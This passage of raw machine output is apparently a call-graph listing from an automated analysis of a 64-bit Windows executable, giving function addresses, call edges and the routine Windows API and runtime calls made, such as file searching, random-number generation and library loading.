38452->38476 38453 7ff695cdb540 147 API calls 38453->38494 38456 7ff695ce8444 54 API calls 38454->38456 38455 7ff695cda410 159 API calls 38455->38494 38456->38434 38457 7ff695cf65b4 48 API calls 38457->38494 38458->38476 38459 7ff695cda4d0 12 API calls 38459->38494 38460 7ff695cf4554 16 API calls 38460->38494 38461 7ff695d1ae50 71 API calls 38465 7ff695cd2e39 38461->38465 38462 7ff695cd33b4 64 API calls 38462->38476 38463 7ff695cf1998 138 API calls 38463->38494 38464 7ff695cd5db4 46 API calls 38464->38494 38465->38461 38466 7ff695ceca40 61 API calls 38465->38466 38465->38476 38466->38476 38467 7ff695cd6188 231 API calls 38467->38476 38468 7ff695cf1e80 15 API calls 38468->38494 38469 7ff695cf7c7c 127 API calls 38469->38494 38470 7ff695cf1930 11 API calls 38470->38494 38471 7ff695cd3f74 138 API calls 38471->38476 38472 7ff695cdb540 147 API calls 38472->38492 38473 7ff695cecbd0 75 API calls 38473->38494 38474 7ff695d0ba9c 195 API calls 38474->38476 38475 7ff695d149f4 48 API calls 38475->38476 38476->38438 38476->38440 38476->38446 38476->38452 38476->38462 38476->38465 38476->38467 38476->38471 38476->38474 38476->38475 38478 7ff695ce8444 54 API calls 38476->38478 38477 7ff695cd5004 49 API calls 38477->38494 38478->38476 38479 7ff695cf18ac 15 API calls 38479->38494 38480 7ff695cd1168 8 API calls 38480->38494 38481 7ff695cd571c 12 API calls 38481->38494 38482 7ff695d1d48c 58 API calls 38482->38494 38483 7ff695cd5e70 169 API calls 38483->38494 38484 7ff695ce9be0 14 API calls 38484->38494 38485 7ff695d1c0a8 10 API calls 38485->38494 38486 7ff695cf6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38486->38494 38487 7ff695d097f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38487->38494 38488 7ff695cf5c0c 237 API calls 38488->38494 38489 7ff695cf5d40 237 API calls 38489->38494 38490 7ff695cd6114 216 API calls 38490->38494 38491 7ff695d149f4 48 API calls 38491->38492 38492->38435 38492->38436 38492->38437 38492->38444 38492->38451 38492->38472 38492->38491 38492->38494 38493 7ff695cf5708 237 API calls 38493->38494 38494->38430 38494->38433 38494->38450 38494->38453 38494->38455 38494->38457 38494->38459 38494->38460 38494->38463 38494->38464 38494->38468 38494->38469 38494->38470 38494->38473 38494->38477 38494->38479 38494->38480 38494->38481 38494->38482 38494->38483 38494->38484 38494->38485 38494->38486 38494->38487 38494->38488 38494->38489 38494->38490 38494->38492 38494->38493 38497 7ff695cfa250 237 API calls 38494->38497 38498 7ff695cfaae0 237 API calls 38494->38498 38499 7ff695ce0d60 237 API calls 38494->38499 38495->38425 38496->38431 38497->38494 38498->38492 38499->38492 38501 7ff695d034f6 38500->38501 38503 7ff695cd1893 38501->38503 38568 7ff695d1dac0 CompareStringW 38501->38568 38503->38372 38503->38382 38507 7ff695cd546f setbuf 38504->38507 38505 7ff695cd554a __scrt_fastfail 38609 7ff695d1c0a8 GetSystemTime SystemTimeToFileTime 38505->38609 38507->38505 38515 7ff695cd5588 __scrt_fastfail 38507->38515 38509 7ff695cd5583 38598 7ff695cd6eb8 38509->38598 38513 7ff695cd681c 54 API calls 38513->38509 38514 7ff695cd56e9 38605 7ff695d16f68 38514->38605 38515->38509 38569 7ff695cd3210 38515->38569 38575 7ff695ce7088 38515->38575 38579 7ff695cd681c 38515->38579 38590 7ff695d17a24 38515->38590 38612 7ff695cd571c 38515->38612 38620 7ff695ce4380 14 API calls 38515->38620 38517 7ff695cd56f6 38518 7ff695d2a610 _handle_error 8 API calls 38517->38518 38519 7ff695cd19df 38518->38519 38524 7ff695cd72c4 38519->38524 38525 7ff695cd72eb 38524->38525 38736 7ff695ce88dc 38525->38736 38527 7ff695cd7302 38740 7ff695d0915c 38527->38740 38529 7ff695cd730f 38752 7ff695d07044 38529->38752 38532 7ff695d2a444 new 4 API calls 38533 7ff695cd73e3 38532->38533 38534 7ff695cd73f5 __scrt_fastfail 38533->38534 38768 7ff695cf894c 38533->38768 38757 7ff695ce9be0 38534->38757 38539 7ff695cd7539 38538->38539 38861 7ff695d0922c 38539->38861 38543 7ff695ce6d45 38542->38543 38544 7ff695ce6cbc 38542->38544 38545 7ff695ce6d83 38543->38545 38547 7ff695ce6d69 38543->38547 38877 7ff695d09f78 8 API calls 2 library calls 38543->38877 38546 7ff695ce6cd9 38544->38546 38872 7ff695d09f78 8 API calls 2 library calls 38544->38872 38545->38401 38549 7ff695ce6cf3 38546->38549 38873 7ff695d09f78 8 API calls 2 library calls 38546->38873 38547->38545 38878 7ff695d09f78 8 API calls 2 library calls 38547->38878 38550 7ff695ce6d0d 38549->38550 38874 7ff695d09f78 8 API calls 2 library calls 38549->38874 38556 7ff695ce6d2b 38550->38556 38875 7ff695d09f78 8 API calls 2 library calls 38550->38875 38556->38545 38876 7ff695d09f78 8 API calls 2 library calls 38556->38876 38559 7ff695cd7162 38558->38559 38560 7ff695cd7167 38558->38560 38879 7ff695cd6c64 130 API calls _handle_error 38559->38879 38562->38379 38563->38371 38564->38373 38565->38380 38566->38385 38567->38383 38568->38503 38570 7ff695cd3231 38569->38570 38574 7ff695cd32e9 38569->38574 38570->38574 38621 7ff695ce4380 14 API calls 38570->38621 38572 7ff695cd329c 38572->38574 38622 7ff695cf2a20 22 API calls 2 library calls 38572->38622 38574->38515 38576 7ff695ce70a4 38575->38576 38577 7ff695ce70c5 38576->38577 38623 7ff695cf8558 10 API calls 2 library calls 38576->38623 38577->38515 38624 7ff695cd6714 38579->38624 38581 7ff695cd6853 38581->38515 38582 7ff695cd6836 38582->38581 38635 7ff695d348c0 31 API calls _invalid_parameter_noinfo 38582->38635 38584 7ff695cd684b 38584->38581 38585 7ff695cd68a9 std::bad_alloc::bad_alloc 38584->38585 38636 7ff695d2ba34 RtlPcToFileHeader RaiseException 38585->38636 38587 7ff695cd68c4 38637 7ff695cd7188 12 API calls 38587->38637 38589 7ff695cd68eb 38589->38515 38591 7ff695d17a4f 38590->38591 38596 7ff695d17a59 38590->38596 38591->38515 38592 7ff695d17a7c 38674 7ff695d1b6d0 73 API calls _Init_thread_footer 38592->38674 38595 7ff695d17b1c 60 API calls 38595->38596 38596->38591 38596->38592 38596->38595 38642 7ff695d171fc 38596->38642 38675 7ff695ce41b0 14 API calls 2 library calls 38596->38675 38599 7ff695cd6ee6 38598->38599 38604 7ff695cd6f5c 38598->38604 38725 7ff695d19f64 8 API calls __BuildCatchObjectHelper 38599->38725 38601 7ff695cd6efb 38602 7ff695cd6f2f 38601->38602 38601->38604 38602->38601 38726 7ff695cd7188 12 API calls 38602->38726 38604->38514 38606 7ff695d16fb4 38605->38606 38608 7ff695d16f8a 38605->38608 38607 7ff695cf4538 FindClose 38607->38608 38608->38606 38608->38607 38610 7ff695d2a610 _handle_error 8 API calls 38609->38610 38611 7ff695cd5576 38610->38611 38611->38513 38613 7ff695cd5742 38612->38613 38617 7ff695cd575d 38612->38617 38613->38617 38731 7ff695d03520 12 API calls 2 library calls 38613->38731 38727 7ff695d03610 38617->38727 38618 7ff695cd57fc 38618->38515 38620->38515 38621->38572 38622->38574 38623->38576 38625 7ff695cd6738 38624->38625 38634 7ff695cd67a7 __BuildCatchObjectHelper 38624->38634 38626 7ff695cd6765 38625->38626 38638 7ff695ceca6c 48 API calls 3 library calls 38625->38638 38630 7ff695cd67e1 38626->38630 38631 7ff695cd6786 38626->38631 38628 7ff695cd6759 38639 7ff695cecb64 8 API calls 38628->38639 38630->38634 38641 7ff695cecb64 8 API calls 38630->38641 38631->38634 38640 7ff695cecb64 8 API calls 38631->38640 38634->38582 38635->38584 38636->38587 38637->38589 38638->38628 38648 7ff695d17217 setbuf 38642->38648 38643 7ff695d173c5 38676 7ff695cf45cc 38643->38676 38644 7ff695d2a610 _handle_error 8 API calls 38646 7ff695d1776f 38644->38646 38646->38596 38648->38643 38660 7ff695d1729c 38648->38660 38670 7ff695d1725a 38648->38670 38683 7ff695cf4554 38648->38683 38649 7ff695d17453 38652 7ff695d17476 38649->38652 38653 7ff695d17464 38649->38653 38651 7ff695d176ef 38651->38670 38700 7ff695cf8558 10 API calls 2 library calls 38651->38700 38654 7ff695d17496 38652->38654 38680 7ff695cf4538 38652->38680 38697 7ff695d17c38 55 API calls 3 library calls 38653->38697 38665 7ff695cf4554 16 API calls 38654->38665 38654->38670 38655 7ff695d17342 38655->38651 38655->38670 38671 7ff695d17656 38655->38671 38698 7ff695ce4380 14 API calls 38655->38698 38659 7ff695d17471 38659->38652 38662 7ff695d173bb 38660->38662 38664 7ff695d1732e 38660->38664 38691 7ff695d2a444 38662->38691 38664->38655 38667 7ff695d1734a 38664->38667 38665->38670 38666 7ff695d1737e 38666->38670 38690 7ff695cecbd0 75 API calls 38666->38690 38667->38666 38667->38670 38689 7ff695ce4380 14 API calls 38667->38689 38670->38644 38671->38651 38671->38670 38672 7ff695d17723 38671->38672 38699 7ff695cdc214 8 API calls 2 library calls 38672->38699 38675->38596 38678 7ff695cf45ed 38676->38678 38677 7ff695cf46ec 15 API calls 38677->38678 38678->38677 38679 7ff695cf46b2 38678->38679 38679->38649 38679->38655 38681 7ff695cf454f 38680->38681 38682 7ff695cf4549 FindClose 38680->38682 38681->38654 38682->38681 38684 7ff695cf4570 38683->38684 38688 7ff695cf4574 38684->38688 38701 7ff695cf46ec 38684->38701 38687 7ff695cf458d FindClose 38687->38688 38688->38660 38689->38666 38690->38670 38694 7ff695d2a44f 38691->38694 38692 7ff695d2a47a 38692->38643 38694->38692 38714 7ff695d336c0 38694->38714 38717 7ff695d2b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38694->38717 38718 7ff695d2b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38694->38718 38697->38659 38698->38671 38699->38670 38700->38670 38702 7ff695cf4705 setbuf 38701->38702 38703 7ff695cf47a4 FindNextFileW 38702->38703 38704 7ff695cf4733 FindFirstFileW 38702->38704 38706 7ff695cf47ae GetLastError 38703->38706 38713 7ff695cf478b 38703->38713 38705 7ff695cf4749 38704->38705 38704->38713 38707 7ff695d04534 10 API calls 38705->38707 38706->38713 38708 7ff695cf475b 38707->38708 38710 7ff695cf475f FindFirstFileW 38708->38710 38711 7ff695cf477a GetLastError 38708->38711 38709 7ff695d2a610 _handle_error 8 API calls 38712 7ff695cf4587 38709->38712 38710->38711 38710->38713 38711->38713 38712->38687 38712->38688 38713->38709 38719 7ff695d33700 38714->38719 38724 7ff695d36938 EnterCriticalSection 38719->38724 38721 7ff695d3370d 38722 7ff695d36998 fflush LeaveCriticalSection 38721->38722 38723 7ff695d336d2 38722->38723 38723->38694 38725->38601 38726->38602 38728 7ff695d03626 setbuf wcschr 38727->38728 38729 7ff695d2a610 _handle_error 8 API calls 38728->38729 38730 7ff695cd57e1 38729->38730 38730->38618 38732 7ff695d048bc 38730->38732 38731->38617 38733 7ff695d048cb setbuf 38732->38733 38734 7ff695d2a610 _handle_error 8 API calls 38733->38734 38735 7ff695d0493a 38734->38735 38735->38618 38737 7ff695ce8919 38736->38737 38773 7ff695d14b14 38737->38773 38739 7ff695ce8954 __scrt_fastfail 38739->38527 38741 7ff695d09199 38740->38741 38778 7ff695d2a480 38741->38778 38744 7ff695d2a444 new 4 API calls 38745 7ff695d091cf 38744->38745 38746 7ff695d091e1 38745->38746 38747 7ff695ce88dc 8 API calls 38745->38747 38748 7ff695d2a444 new 4 API calls 38746->38748 38747->38746 38749 7ff695d091f7 38748->38749 38750 7ff695d09209 38749->38750 38751 7ff695ce88dc 8 API calls 38749->38751 38750->38529 38751->38750 38753 7ff695ce88dc 8 API calls 38752->38753 38754 7ff695d07063 38753->38754 38786 7ff695d072c0 38754->38786 38790 7ff695ce901c CryptAcquireContextW 38757->38790 38761 7ff695ce9c2a 38800 7ff695d19ce4 38761->38800 38765 7ff695ce9c5b __BuildCatchObjectHelper 38766 7ff695d2a610 _handle_error 8 API calls 38765->38766 38767 7ff695cd1a01 38766->38767 38767->38391 38817 7ff695d17d80 38768->38817 38774 7ff695d14b26 38773->38774 38775 7ff695d14b2b 38773->38775 38777 7ff695d14b38 8 API calls _handle_error 38774->38777 38775->38739 38777->38775 38779 7ff695d2a444 38778->38779 38780 7ff695d091be 38779->38780 38781 7ff695d336c0 new 2 API calls 38779->38781 38784 7ff695d2b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38779->38784 38785 7ff695d2b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38779->38785 38780->38744 38781->38779 38787 7ff695d072dd 38786->38787 38788 7ff695cd7325 38787->38788 38789 7ff695d2a480 4 API calls 38787->38789 38788->38532 38788->38534 38789->38788 38791 7ff695ce907e 38790->38791 38792 7ff695ce9057 CryptGenRandom CryptReleaseContext 38790->38792 38794 7ff695ce9c9c 11 API calls 38791->38794 38792->38791 38793 7ff695ce9089 38792->38793 38795 7ff695ce9c9c 38793->38795 38794->38793 38796 7ff695d1c0a8 10 API calls 38795->38796 38797 7ff695ce9cc5 38796->38797 38810 7ff695d32d74 38797->38810 38801 7ff695ce9c49 38800->38801 38802 7ff695d19d15 __BuildCatchObjectHelper 38800->38802 38804 7ff695d19b70 38801->38804 38802->38801 38813 7ff695d19d74 38802->38813 38805 7ff695d19bd9 __scrt_fastfail 38804->38805 38808 7ff695d19bad __scrt_fastfail 38804->38808 38806 7ff695d19d74 8 API calls 38805->38806 38807 7ff695d19c07 38806->38807 38807->38765 38808->38805 38809 7ff695d19d74 8 API calls 38808->38809 38809->38805 38811 7ff695d32d8b QueryPerformanceCounter 38810->38811 38812 7ff695ce9cd7 38810->38812 38811->38812 38812->38761 38814 7ff695d19dbc 38813->38814 38814->38814 38815 7ff695d2a610 _handle_error 8 API calls 38814->38815 38816 7ff695d19f40 38815->38816 38816->38802 38824 7ff695d18094 38817->38824 38820 7ff695cf8a44 38821 7ff695cf8a5a __scrt_fastfail 38820->38821 38856 7ff695d1bac4 38821->38856 38825 7ff695d1809f 38824->38825 38825->38825 38828 7ff695d17ec8 38825->38828 38829 7ff695d17efa __BuildCatchObjectHelper 38828->38829 38835 7ff695d17fb5 38829->38835 38842 7ff695d1b3f0 38829->38842 38831 7ff695d1805c GetCurrentProcessId 38833 7ff695cf896e 38831->38833 38833->38820 38834 7ff695d17f7e GetProcAddressForCaller GetProcAddress 38834->38835 38835->38831 38836 7ff695d17ff1 38835->38836 38836->38833 38851 7ff695ceca6c 48 API calls 3 library calls 38836->38851 38838 7ff695d1801f 38852 7ff695cecda4 10 API calls 2 library calls 38838->38852 38840 7ff695d18027 38853 7ff695ceca40 61 API calls _CxxThrowException 38840->38853 38854 7ff695d2a5a0 38842->38854 38845 7ff695d1b428 38848 7ff695d2a610 _handle_error 8 API calls 38845->38848 38846 7ff695d1b42c 38847 7ff695d048bc 8 API calls 38846->38847 38849 7ff695d1b444 LoadLibraryExW 38847->38849 38850 7ff695d17f72 38848->38850 38849->38845 38850->38834 38850->38835 38851->38838 38852->38840 38853->38833 38855 7ff695d1b3fc GetSystemDirectoryW 38854->38855 38855->38845 38855->38846 38859 7ff695d1ba70 GetCurrentProcess GetProcessAffinityMask 38856->38859 38860 7ff695cf89c5 38859->38860 38860->38534 38864 7ff695d09245 38861->38864 38863 7ff695d092b1 38870 7ff695cf6194 72 API calls 38863->38870 38869 7ff695cf6194 72 API calls 38864->38869 38866 7ff695d092bd 38871 7ff695cf6194 72 API calls 38866->38871 38868 7ff695d092c9 38869->38863 38870->38866 38871->38868 38872->38546 38873->38549 38874->38550 38875->38556 38876->38543 38877->38547 38878->38545 38879->38560 38880 7ff695d3231c 38881 7ff695d3238c 38880->38881 38882 7ff695d32342 GetModuleHandleW 38880->38882 38893 7ff695d36938 EnterCriticalSection 38881->38893 38882->38881 38886 7ff695d3234f 38882->38886 38884 7ff695d36998 fflush LeaveCriticalSection 38885 7ff695d32460 38884->38885 38888 7ff695d3246c 38885->38888 38892 7ff695d32488 11 API calls 38885->38892 38886->38881 38894 7ff695d324d4 GetModuleHandleExW 38886->38894 38887 7ff695d32410 38887->38884 38889 7ff695d343b8 16 API calls 38889->38887 38891 7ff695d32396 38891->38887 38891->38889 38892->38888 38895 7ff695d324fe GetProcAddress 38894->38895 38896 7ff695d32525 38894->38896 38895->38896 38897 7ff695d32518 38895->38897 38898 7ff695d3252f FreeLibrary 38896->38898 38899 7ff695d32535 38896->38899 38897->38896 38898->38899 38899->38881 38900 7ff695d2b0fc 38919 7ff695d2aa8c 38900->38919 38904 7ff695d2b123 __scrt_acquire_startup_lock 38905 7ff695d2b148 38904->38905 38975 7ff695d2b52c 7 API calls __scrt_fastfail 38904->38975 38909 7ff695d2b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38905->38909 38927 7ff695d3472c 38905->38927 38908 7ff695d2b16d 38909->38908 38910 7ff695d2b1f7 38909->38910 38976 7ff695d32574 35 API calls __InternalCxxFrameHandler 38909->38976 38931 7ff695d33fc4 38910->38931 38917 7ff695d2b220 38977 7ff695d2ac64 8 API calls 2 library calls 38917->38977 38920 7ff695d2aaae __isa_available_init 38919->38920 38978 7ff695d2e2f8 38920->38978 38922 7ff695d2aab7 38922->38904 38974 7ff695d2b52c 7 API calls __scrt_fastfail 38922->38974 38928 7ff695d34744 38927->38928 38929 7ff695d34766 38928->38929 39027 7ff695d2b010 38928->39027 38929->38909 38932 7ff695d2b20c 38931->38932 38933 7ff695d33fd4 38931->38933 38935 7ff695d07e20 38932->38935 39118 7ff695d33c84 54 API calls 38933->39118 39119 7ff695d1b470 GetModuleHandleW 38935->39119 38941 7ff695d07e58 SetErrorMode GetModuleHandleW 38942 7ff695d148cc 21 API calls 38941->38942 38943 7ff695d07e7d 38942->38943 38944 7ff695d13e48 137 API calls 38943->38944 38945 7ff695d07e90 38944->38945 38946 7ff695ce3d3c 126 API calls 38945->38946 38947 7ff695d07e9c 38946->38947 38948 7ff695d2a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38947->38948 38949 7ff695d07ead 38948->38949 38950 7ff695d07ebf 38949->38950 38951 7ff695ce3f18 70 API calls 38949->38951 38952 7ff695ce4d1c 157 API calls 38950->38952 38951->38950 38953 7ff695d07ed6 38952->38953 38954 7ff695d07eef 38953->38954 38956 7ff695ce6ad0 154 API calls 38953->38956 38955 7ff695ce4d1c 157 API calls 38954->38955 38958 7ff695d07eff 38955->38958 38957 7ff695d07ee7 38956->38957 38959 7ff695ce4e48 160 API calls 38957->38959 38960 7ff695d07f0d 38958->38960 38962 7ff695d07f14 38958->38962 38959->38954 38961 7ff695d1b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38960->38961 38961->38962 38963 7ff695ce4888 58 API calls 38962->38963 38964 7ff695d07f57 38963->38964 38965 7ff695ce4fd0 268 API calls 38964->38965 38966 7ff695d07f5f 38965->38966 38967 7ff695d07f9e 38966->38967 38968 7ff695d07f8c 38966->38968 38972 7ff695d2b684 GetModuleHandleW 38967->38972 38969 7ff695d1b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38968->38969 38970 7ff695d07f93 38969->38970 38970->38967 38971 7ff695d1b57c 14 API calls 38970->38971 38971->38967 38973 7ff695d2b698 38972->38973 38973->38917 38974->38904 38975->38905 38976->38910 38977->38908 38979 7ff695d2e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38978->38979 38991 7ff695d2eb08 38979->38991 38983 7ff695d2e318 38985 7ff695d2aab3 38983->38985 38998 7ff695d2eb50 DeleteCriticalSection 38983->38998 38985->38922 38986 7ff695d345e4 38985->38986 38988 7ff695d39d4c 38986->38988 38987 7ff695d2aac0 38987->38922 38990 7ff695d2e32c 8 API calls 3 library calls 38987->38990 38988->38987 39015 7ff695d366c0 38988->39015 38990->38922 38992 7ff695d2eb10 38991->38992 38994 7ff695d2eb41 38992->38994 38995 7ff695d2e30b 38992->38995 38999 7ff695d2e678 38992->38999 39004 7ff695d2eb50 DeleteCriticalSection 38994->39004 38995->38985 38997 7ff695d2e8a4 8 API calls 3 library calls 38995->38997 38997->38983 38998->38985 39005 7ff695d2e34c 38999->39005 39002 7ff695d2e6cf InitializeCriticalSectionAndSpinCount 39003 7ff695d2e6bb 39002->39003 39003->38992 39004->38995 39006 7ff695d2e3b2 39005->39006 39009 7ff695d2e3ad 39005->39009 39006->39002 39006->39003 39007 7ff695d2e3e5 LoadLibraryExW 39007->39009 39010 7ff695d2e40b GetLastError 39007->39010 39008 7ff695d2e489 GetProcAddress 39008->39006 39012 7ff695d2e4a1 39008->39012 39009->39006 39009->39007 39013 7ff695d2e47a 39009->39013 39014 7ff695d2e458 FreeLibrary 39009->39014 39010->39009 39011 7ff695d2e416 LoadLibraryExW 39010->39011 39011->39009 39012->39006 39013->39006 39013->39008 39014->39009 39026 7ff695d36938 EnterCriticalSection 39015->39026 39017 7ff695d366d0 39018 7ff695d38050 32 API calls 39017->39018 39019 7ff695d366d9 39018->39019 39020 7ff695d366e7 39019->39020 39021 7ff695d364d0 34 API calls 39019->39021 39022 7ff695d36998 fflush LeaveCriticalSection 39020->39022 39023 7ff695d366e2 39021->39023 39024 7ff695d366f3 39022->39024 39025 7ff695d365bc GetStdHandle GetFileType 39023->39025 39024->38988 39025->39020 39028 7ff695d2b020 pre_c_initialization 39027->39028 39048 7ff695d32b00 39028->39048 39030 7ff695d2b02c pre_c_initialization 39054 7ff695d2aad8 39030->39054 39032 7ff695d2b045 39033 7ff695d2b049 _RTC_Initialize 39032->39033 39034 7ff695d2b0b5 39032->39034 39059 7ff695d2ace0 39033->39059 39090 7ff695d2b52c 7 API calls __scrt_fastfail 39034->39090 39036 7ff695d2b0bf 39091 7ff695d2b52c 7 API calls __scrt_fastfail 39036->39091 39038 7ff695d2b05a pre_c_initialization 39062 7ff695d33b0c 39038->39062 39040 7ff695d2b0ca __scrt_initialize_default_local_stdio_options 39040->38928 39043 7ff695d2b06a 39089 7ff695d2b7dc RtlInitializeSListHead 39043->39089 39049 7ff695d32b11 39048->39049 39050 7ff695d32b19 39049->39050 39092 7ff695d34f3c 15 API calls _set_errno_from_matherr 39049->39092 39050->39030 39052 7ff695d32b28 39093 7ff695d34e1c 31 API calls _invalid_parameter_noinfo 39052->39093 39055 7ff695d2ab96 39054->39055 39058 7ff695d2aaf0 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 39054->39058 39094 7ff695d2b52c 7 API calls __scrt_fastfail 39055->39094 39057 7ff695d2aba0 39058->39032 39095 7ff695d2ac90 39059->39095 39061 7ff695d2ace9 39061->39038 39063 7ff695d33b2a 39062->39063 39064 7ff695d33b40 39062->39064 39104 7ff695d34f3c 15 API calls _set_errno_from_matherr 39063->39104 39100 7ff695d39370 39064->39100 39067 7ff695d33b2f 39105 7ff695d34e1c 31 API calls _invalid_parameter_noinfo 39067->39105 39070 7ff695d33b72 39106 7ff695d338ec 35 API calls pre_c_initialization 39070->39106 39072 7ff695d33b9c 39107 7ff695d33aa8 15 API calls __vcrt_getptd_noexit 39072->39107 39074 7ff695d33bb2 39075 7ff695d33bba 39074->39075 39076 7ff695d33bcb 39074->39076 39108 7ff695d34f3c 15 API calls _set_errno_from_matherr 39075->39108 39109 7ff695d338ec 35 API calls pre_c_initialization 39076->39109 39079 7ff695d34a74 __vcrt_getptd_noexit 15 API calls 39088 7ff695d2b066 39079->39088 39080 7ff695d33be7 39081 7ff695d33c17 39080->39081 39082 7ff695d33c30 39080->39082 39087 7ff695d33bbf 39080->39087 39110 7ff695d34a74 39081->39110 39085 7ff695d34a74 __vcrt_getptd_noexit 15 API calls 39082->39085 39084 7ff695d33c20 39086 7ff695d34a74 __vcrt_getptd_noexit 15 API calls 39084->39086 39085->39087 39086->39088 39087->39079 39088->39036 39088->39043 39090->39036 39091->39040 39092->39052 39093->39050 39094->39057 39096 7ff695d2acbf 39095->39096 39098 7ff695d2acb5 _onexit 39095->39098 39099 7ff695d34434 34 API calls _onexit 39096->39099 39098->39061 39099->39098 39101 7ff695d3937d 39100->39101 39102 7ff695d33b45 GetModuleFileNameA 39100->39102 39116 7ff695d391b0 48 API calls 5 library calls 39101->39116 39102->39070 39104->39067 39105->39088 39106->39072 39107->39074 39108->39087 39109->39080 39111 7ff695d34a79 RtlFreeHeap 39110->39111 39115 7ff695d34aa9 __vcrt_getptd_noexit 39110->39115 39112 7ff695d34a94 39111->39112 39111->39115 39117 7ff695d34f3c 15 API calls _set_errno_from_matherr 39112->39117 39114 7ff695d34a99 GetLastError 39114->39115 39115->39084 39116->39102 39117->39114 39118->38932 39120 7ff695d1b496 GetProcAddress 39119->39120 39121 7ff695d07e45 39119->39121 39122 7ff695d1b4cb GetProcAddress 39120->39122 39123 7ff695d1b4ae 39120->39123 39124 7ff695ce7a68 39121->39124 39122->39121 39123->39122 39125 7ff695ce7a76 39124->39125 39145 7ff695d32ae4 39125->39145 39127 7ff695ce7a80 39128 7ff695d32ae4 setbuf 60 API calls 39127->39128 39129 7ff695ce7a94 39128->39129 39154 7ff695ce7b44 GetStdHandle GetFileType 39129->39154 39132 7ff695ce7b44 3 API calls 39133 7ff695ce7aae 39132->39133 39134 7ff695ce7b44 3 API calls 39133->39134 39136 7ff695ce7abe 39134->39136 39135 7ff695ce7b12 39144 7ff695cecd78 SetConsoleCtrlHandler 39135->39144 39138 7ff695ce7aeb 39136->39138 39157 7ff695d32abc 31 API calls 2 library calls 39136->39157 39138->39135 39159 7ff695d32abc 31 API calls 2 library calls 39138->39159 39139 7ff695ce7adf 39158 7ff695d32b40 33 API calls 3 library calls 39139->39158 39142 7ff695ce7b06 39160 7ff695d32b40 33 API calls 3 library calls 39142->39160 39146 7ff695d32ae9 39145->39146 39147 7ff695d37ee8 39146->39147 39149 7ff695d37f23 39146->39149 39161 7ff695d34f3c 15 API calls _set_errno_from_matherr 39147->39161 39163 7ff695d37d98 60 API calls 2 library calls 39149->39163 39150 7ff695d37eed 39162 7ff695d34e1c 31 API calls _invalid_parameter_noinfo 39150->39162 39153 7ff695d37ef8 39153->39127 39155 7ff695ce7a9e 39154->39155 39156 7ff695ce7b61 GetConsoleMode 39154->39156 39155->39132 39156->39155 39157->39139 39158->39138 39159->39142 39160->39135 39161->39150 39162->39153 39163->39153 39164 7ff695cd82f0 39165 7ff695cd8306 39164->39165 39177 7ff695cd836f 39164->39177 39166 7ff695cd8324 39165->39166 39170 7ff695cd8371 39165->39170 39165->39177 39284 7ff695cf2414 61 API calls 39166->39284 39168 7ff695cd8347 39285 7ff695cf1998 138 API calls 39168->39285 39170->39177 39286 7ff695cf1998 138 API calls 39170->39286 39171 7ff695cd835e 39173 7ff695cf18ac 15 API calls 39171->39173 39173->39177 39187 7ff695cda410 39177->39187 39178 7ff695cd8578 39179 7ff695cdb540 147 API calls 39178->39179 39184 7ff695cd858f 39179->39184 39180 7ff695cdb540 147 API calls 39180->39178 39181 7ff695cd8634 39182 7ff695d2a610 _handle_error 8 API calls 39181->39182 39183 7ff695cd8663 39182->39183 39184->39181 39287 7ff695cd9628 175 API calls 39184->39287 39288 7ff695d07a68 39187->39288 39190 7ff695cd853a 39192 7ff695cdb540 39190->39192 39196 7ff695cdb55f setbuf 39192->39196 39193 7ff695cdb5a1 39194 7ff695cdb5d8 39193->39194 39195 7ff695cdb5b8 39193->39195 39436 7ff695d08c1c 39194->39436 39322 7ff695cdaba0 39195->39322 39196->39193 39318 7ff695cda4d0 39196->39318 39199 7ff695d2a610 _handle_error 8 API calls 39200 7ff695cd854f 39199->39200 39200->39178 39200->39180 39201 7ff695cdb67f 39202 7ff695cdbc91 39201->39202 39204 7ff695cdb6a5 39201->39204 39205 7ff695cdbbae 39201->39205 39203 7ff695cdb5d3 39202->39203 39207 7ff695cf2574 126 API calls 39202->39207 39203->39199 39204->39203 39215 7ff695cdb6b5 39204->39215 39234 7ff695cdb79f 39204->39234 39208 7ff695d08d00 48 API calls 39205->39208 39207->39203 39210 7ff695cdbc5c 39208->39210 39505 7ff695d08d38 48 API calls 39210->39505 39214 7ff695cdbc69 39506 7ff695d08d38 48 API calls 39214->39506 39215->39203 39470 7ff695d08d00 39215->39470 39217 7ff695cdbc76 39507 7ff695d08d38 48 API calls 39217->39507 39219 7ff695cdbc84 39508 7ff695d08d88 48 API calls 39219->39508 39224 7ff695cdb726 39474 7ff695d08d38 48 API calls 39224->39474 39226 7ff695cdb733 39227 7ff695cdb749 39226->39227 39475 7ff695d08d88 48 API calls 39226->39475 39229 7ff695cdb75c 39227->39229 39476 7ff695d08d38 48 API calls 39227->39476 39230 7ff695cdb779 39229->39230 39233 7ff695d08d00 48 API calls 39229->39233 39477 7ff695d08f94 39230->39477 39233->39229 39235 7ff695cdb8e5 39234->39235 39487 7ff695cdc3c8 CharLowerW CharUpperW 39234->39487 39488 7ff695d1d840 WideCharToMultiByte 39235->39488 39239 7ff695cdb9a1 39241 7ff695d08d00 48 API calls 39239->39241 39243 7ff695cdb9c4 39241->39243 39242 7ff695cdb910 39242->39239 39490 7ff695cd945c 55 API calls _handle_error 39242->39490 39491 7ff695d08d38 48 API calls 39243->39491 39245 7ff695cdb9d1 39492 7ff695d08d38 48 API calls 39245->39492 39247 7ff695cdb9de 39493 7ff695d08d88 48 API calls 39247->39493 39249 7ff695cdb9eb 39494 7ff695d08d88 48 API calls 39249->39494 39251 7ff695cdba0b 39252 7ff695d08d00 48 API calls 39251->39252 39253 7ff695cdba27 39252->39253 39495 7ff695d08d88 48 API calls 39253->39495 39255 7ff695cdba37 39256 7ff695cdba49 39255->39256 39496 7ff695d1bc48 15 API calls 39255->39496 39497 7ff695d08d88 48 API calls 39256->39497 39259 